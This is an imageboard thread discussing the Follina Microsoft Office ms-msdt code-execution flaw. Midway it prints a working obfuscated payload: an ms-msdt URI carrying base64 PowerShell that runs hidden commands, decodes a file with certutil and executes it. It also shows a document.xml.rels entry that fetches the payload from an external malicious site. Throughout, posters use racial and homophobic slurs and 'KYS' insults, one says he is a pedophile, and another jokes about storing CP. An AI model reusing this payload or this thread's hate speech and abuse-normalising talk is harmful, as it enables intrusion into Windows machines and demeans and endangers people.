https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
>a whitehat found some bizzare microsoft official URI protocol that downloads and executes powershell scripts at will
>microsoft refuses to release a security bulletin, instead silently patches it in insider releases
this shit GLOWS
>installing microsoft products
>ever
>tfw real life forces you to install microshit on your macbook
You can't seriously think appleshit doesnt have three-letter backdoors
It doesn't. They got in a big fight with the government over not wanting to unlock that terrorists' iphone. It could have been a 24hrs before something goes off scenario and Apple sill didn't budge. That's why they have my respect.
What are publicity stunts?
JAJAJAJAJAJAAJAJAJ
spic
Dumb homosexual. KYS.
lel
you are moronic
I keep windows xp on my MacBook in a little box. I only let him out when I need to talk to hardware with some vendor custom drivers
Libreoffice is awful, especially for non-Latin text
thank you for your service glowsirs and glowmadams.
Bad guys cant install a virus if the good guys infect you first!
>You have 2 free member-only stories left this month. Sign up for Medium and get an extra one
Kys Black person. Shove your paywalled article up your ass.
If the only reference is a shitty Medium Gold article this is obviously then this is obviously a nothingburger.
delivering because OP is a homosexual
https://archive.is/BahYU
Posting an archive misses the point.
If this is posted behind a soft-paywalled blog then it should be considered an ad and shouldn't be paid attention to. It doesn't even look like that's the primary source since it mentions some twitter gay.
And if the OP linked to twitter you would be b***hing about that instead
Well maybe he shouldn't have posted about this at all.
Every day I miss 8ch and its anons that knew to include the full, archived article instead of just cropped headlines and the occasional link that just feeds the machine with clicks and ads.
>anti-adblock schizo shows up right on schedule
There's 8ch dot moe and the webring, with the webring /tech/ being on zzzchan.xyz.
Nevermind, despite the shitty source I changed my mind. This is a pretty big deal if true.
https://archive.
ph/BahYU
>obviously a nothingburger
dumb frick
>This is a pretty big deal if true.
is true and a massive deal. many microsoft products going back years are likely to be exploitable in the same way.
Please don't call me a dumb frick. I was just being provocative to OP for posting this article instead of a more reliable source.
Wowwww, maybe you shouldn’t have blocked all those ads, huh?
*stands up*
*claps*
get a real job
+1 rupee
+2 rupees
+5 rupees
Were you ever going to browse it afterwards? It didn't matter, you're just a reactionary clown.
>downloads and executes powershell scripts at will
WTF??? This is huge.
>downloads and executes powershell scripts at will
I am pretty sure you can do this without admin rights.
The problem is not the user executing scripts, the problem is the document itself automatically downloading and executing scripts crafted by the .docx author.
Oh nice. Frick MS.
It also works with RTF files
Likely. I mean, we know they do this already. They'll just say it was a bug and move on.
I can't even view the article in the OP. It shows me the first sentence then tells me to pay up. What a shitty fricking website.
Frick I hate MS
I'm forced to use their glowware
Stallman was right again
This is why you keep a dedicated work system and work happens on it. Apart from that frick that shit shut it down and use proper software.
>install GlowieOS
>it glows
What did you think was going to happen?
Help free yourself my friend
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'*~~)i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"";
This is linkek from a relationship in the docx
https://docs.fileformat.com/word-processing/docx/#relationships---_relsrels
The resource linked is described as oleObject:
Archive: 05-2022-0438.doc
*
*
*
* word/_rels/document.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
[..]
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://www.xmlformats.comMALWARESITE/office/word/2022/worddprocessingDrawing/RDF842l.html!" TargetMode="External"/>
This file is a HTML file with a script (pic related)
That is some beautiful looking code brother
>it's already been fixed
>requires macros to be enabled
>no eop
Yep, it's yet another IQfy nothingburger.
Why does it have to be every time.
In the article they say it works with macros disabled. Good thing it is fixed now
>implying
They just shifted the protocol semantics around and kept the backdoor intact
>microsoft refuses to release a security bulletin, instead silently patches it in insider releases
they haven't patched it
>Good thing it is fixed now
It's not,
RTF files still have the vulnerability.
>requires macros to be enabled
you illiterate gorilla Black person
>https://archive.is/BahYU
You're a fricking nothingburger
Microsoft employees are not allowed to post on IQfy.
Don't care still using Windows. I have nothing to hide from the government because I'm not a sick pedophile.
You're just a sedentary sea creature waving in the currents.
How do I become a cute little hermit crab?
I am a pedophile but I still use Windows because it works
Why are you so pedophobic? Go for a walk.
you dont have private anything
nudes, unfinished novels, code, pics of your kids/whatever, social security numbers, etc.
are you one of those famous incels
Shit likes this makes me glad I am a linux autist.
WINgayS BTFO
bump for visibility
Does it also work if you don't enable editing?
It should be a static read-only document that doesn't do anything, right?
considering it even works from the explorer preview before you open the document... i don't think that will help you
Frick
time to firewall your office suite
Yes, it works inside of protected view.
>whitehats
This is blatant racism and as an ally of Black folk worldwide I must condemn this horrifying mis-usage of the word
what should they be called then?
Goodest bois
they aren't good THOUGH
Should I just become a paranoid schizo at this point?
yes
>not keeping your CP in the win98 machine
Amateurs
Good combination of 'safe' components to do undesirable things. Office doesn't secure the use of ms-msdt scheme because "Hey, it's just starting the built-in Windows troubleshooter tool". Then MSDT allows you to specify things that aren't actually troubleshooting modules because 'why would anyone call us one something that isn't a valid troubleshooting module'.
>NSA
Microshit
ftfy
dostoddlers btfo
no microsoft is trying to be very quiet because they force install office since windows 10, every single computer out there can be totally fricked unless you went through the trouble to uninstall all of the bloat
>windows is absolute trash
nothing new here. people never used windows because they liked it or it worked.
>Letting word connect to the internet
For what purpose?